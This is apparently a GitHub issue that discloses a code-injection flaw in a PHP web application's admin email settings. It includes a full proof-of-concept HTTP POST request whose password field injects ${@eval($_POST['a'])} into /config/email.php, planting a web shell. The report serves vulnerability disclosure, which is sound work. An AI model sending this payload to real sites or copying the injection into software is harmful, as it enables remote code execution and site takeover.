Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Sorry for my bad english
English: /admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions Chinese: /admin/index/email (需要管理员权限) 后台修改email密码处可以getshell获取网站权限
POC: POST /admin/api/config/editEmail HTTP/1.1 Host: www.lizhi.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://www.lizhi.top Connection: close Referer: http://www.lizhi.top/admin/index/email Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi
smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($_POST['a'])};",'a'=>'
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Sorry for my bad english
English:
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions
Chinese:
/admin/index/email (需要管理员权限) 后台修改email密码处可以getshell获取网站权限
POC:
POST /admin/api/config/editEmail HTTP/1.1
Host: www.lizhi.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://www.lizhi.top
Connection: close
Referer: http://www.lizhi.top/admin/index/email
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi
smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($_POST['a'])};",'a'=>'
The text was updated successfully, but these errors were encountered: